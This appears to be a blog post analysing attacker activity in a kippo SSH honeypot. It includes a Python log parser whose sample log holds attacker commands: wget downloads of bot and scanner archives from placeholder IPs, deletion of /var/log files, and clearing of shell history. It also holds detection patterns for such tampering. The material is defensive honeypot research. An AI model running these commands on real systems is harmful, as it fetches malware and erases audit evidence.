SSH Honeypotting – Bad guy in action.

An SSH server allows remote control of, and access to, a system. In this article I present my analysis of the files captured and the activities carried out by attackers who were trapped in our SSH honeypot.

Here I am also going to post several videos, or screen playbacks, of attacker activity in my honeypot.


A few months back I launched my project “Capturing Malware with Honeypot on Unifi”.

Basically, this project is something I am interested in, and I am able to publish my findings publicly.

An SSH server is a program that uses the Secure Shell protocol to accept connections from remote computers. SFTP/SCP file transfers and remote terminal sessions are the most common uses of an SSH server.

SSH servers are widely used in both the private sector and government; for example, they are deployed on DNS servers, mail servers and most Linux and UNIX servers.

I would like to start this post with the statistics and results I got from my honeypot.

Top 10 SSH clients

This vertical bar chart displays the top 10 SSH client versions used by attackers during their attacks, with the total number of attempts detected for each.

(Chart: SSH Client Version)

Top 10 usernames

This vertical bar chart displays the top 10 usernames that attackers tried when attacking the system.

(Chart: Top Usernames Used)

Playback screen – watch this:

This video shows the attacker's activity after they managed to guess the password of my running kippo honeypot.

Playback screen – from log file – the attacker deleting history and log files.

In this video you will find several methods and commands executed by the attacker to remove and hide traces of their activity.

From log file – wget commands

The following table displays the latest “wget” commands entered by attackers in the honeypot system.

(Screenshot: wget commands table, 2013-01-29)
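The client-version and username charts, the history/log deletion video and the wget table above are all things you can pull straight out of kippo's log file. The script below is an added example written for this post, not kippo's own code or the original author's; it assumes the line layout of kippo.log as I recall it (a "[component,connection-id,peer-ip]" prefix, "Remote SSH version:", "login attempt [user/pass] failed|succeeded" and "CMD:" events), and the log lines it runs on are constructed for the example, not captured traffic. It counts client banners and usernames, lists the logins kippo accepted, extracts the URL and host from every wget, and flags commands that tamper with shell history or system logs.

```python
"""Summarise attacker activity from kippo SSH-honeypot logs.

Added example, not code from kippo or from the original post. The line layout
follows the kippo.log format as I recall it (an assumption: adjust the regexes
to your own log); the sample lines are constructed, not captured traffic.
"""
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample log (not real captures), in the kippo.log shape described above.
SAMPLE_LOG = """\
2013-01-29 10:40:01+0800 [HoneyPotTransport,0,203.0.113.5] Remote SSH version: SSH-2.0-libssh2_1.4.2
2013-01-29 10:40:02+0800 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/123456] failed
2013-01-29 10:40:03+0800 [SSHService ssh-userauth on HoneyPotTransport,0,203.0.113.5] login attempt [root/password] succeeded
2013-01-29 10:40:09+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,203.0.113.5] CMD: unset HISTFILE; export HISTSIZE=0
2013-01-29 10:40:15+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,203.0.113.5] CMD: wget http://198.51.100.7/bot/x.tgz
2013-01-29 10:40:20+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,203.0.113.5] CMD: rm -rf /var/log/wtmp /var/log/secure; history -c
2013-01-29 10:41:01+0800 [HoneyPotTransport,1,198.51.100.23] Remote SSH version: SSH-2.0-PuTTY_Release_0.62
2013-01-29 10:41:02+0800 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.23] login attempt [admin/admin] failed
2013-01-29 10:41:03+0800 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.23] login attempt [root/toor] failed
2013-01-29 10:42:01+0800 [HoneyPotTransport,2,192.0.2.77] Remote SSH version: SSH-2.0-libssh2_1.4.2
2013-01-29 10:42:02+0800 [SSHService ssh-userauth on HoneyPotTransport,2,192.0.2.77] login attempt [root/root] succeeded
2013-01-29 10:42:10+0800 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,192.0.2.77] CMD: cd /tmp && wget http://192.0.2.200/.x/scan.tar.gz -O s.tgz
"""

IP_RE = re.compile(r"HoneyPotTransport,\d+,([\d.]+)\]")
VERSION_RE = re.compile(r"Remote SSH version: (\S+)")
LOGIN_RE = re.compile(r"login attempt \[([^/\]]*)/(.*)\] (failed|succeeded)")
CMD_RE = re.compile(r"\] CMD: (.*)$")
# First URL after a wget token; stops at shell separators so "cd /tmp && wget ..." works.
WGET_URL_RE = re.compile(r"\bwget\b[^;&|]*?((?:https?|ftp)://\S+)")

# Command patterns that, in the sessions I have watched, mean "hide my tracks".
ANTI_FORENSICS = {
    "clear shell history": re.compile(r"\bhistory\s+-c\b"),
    "disable history file": re.compile(r"\bunset\s+HISTFILE\b|\bHISTFILE=/dev/null\b"),
    "zero history size": re.compile(r"\bHISTSIZE=0\b"),
    "delete system logs": re.compile(r"\brm\b[^;&|]*/var/log/"),
    "touch login records": re.compile(r"\b(?:wtmp|utmp|lastlog)\b|\.bash_history\b"),
}


def _peer_ip(line):
    m = IP_RE.search(line)
    return m.group(1) if m else "unknown"


def top_ssh_clients(log, n=10):
    """Client banners announced at connect time, most common first."""
    versions = (VERSION_RE.search(l) for l in log.splitlines())
    return Counter(m.group(1) for m in versions if m).most_common(n)


def top_usernames(log, n=10):
    """Usernames tried (failed or not), most common first."""
    logins = (LOGIN_RE.search(l) for l in log.splitlines())
    return Counter(m.group(1) for m in logins if m).most_common(n)


def successful_logins(log):
    """(peer ip, username, password) for every guess kippo accepted."""
    out = []
    for line in log.splitlines():
        m = LOGIN_RE.search(line)
        if m and m.group(3) == "succeeded":
            out.append((_peer_ip(line), m.group(1), m.group(2)))
    return out


def wget_downloads(log):
    """(peer ip, url, host) for each wget typed: the hosts are what you block or fetch from."""
    out = []
    for line in log.splitlines():
        cmd = CMD_RE.search(line)
        if not cmd:
            continue
        for url in WGET_URL_RE.findall(cmd.group(1)):
            out.append((_peer_ip(line), url, urlparse(url).hostname))
    return out


def anti_forensics(log):
    """(peer ip, command, [labels]) for commands that tamper with history or logs."""
    out = []
    for line in log.splitlines():
        cmd = CMD_RE.search(line)
        if not cmd:
            continue
        hits = [label for label, rx in ANTI_FORENSICS.items() if rx.search(cmd.group(1))]
        if hits:
            out.append((_peer_ip(line), cmd.group(1), hits))
    return out


if __name__ == "__main__":
    print("Top SSH clients:", top_ssh_clients(SAMPLE_LOG))
    print("Top usernames:", top_usernames(SAMPLE_LOG))
    print("Accepted logins:", successful_logins(SAMPLE_LOG))
    print("wget downloads:", wget_downloads(SAMPLE_LOG))
    for ip, cmd, hits in anti_forensics(SAMPLE_LOG):
        print(f"{ip}: {cmd!r} -> {', '.join(hits)}")
```

Run it against a real kippo.log by reading the file into a string in place of SAMPLE_LOG. The anti-forensics patterns are deliberately loose (any rm that touches /var/log, any mention of wtmp/utmp/lastlog); in a honeypot every command is attacker-typed, so false positives cost nothing, whereas on a production host you would want to tighten them.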


Top detected malware in December 2012 from 500 computers in Klang Valley

Happy New Year guys! We are already in 2013; if we look back on security news, a lot of cool and troll stories happened in 2012.

To conclude my security observations from the log files collected by my sensors, here I publish the top detected malware for December 2012.

(Chart: Top Malware December 2012)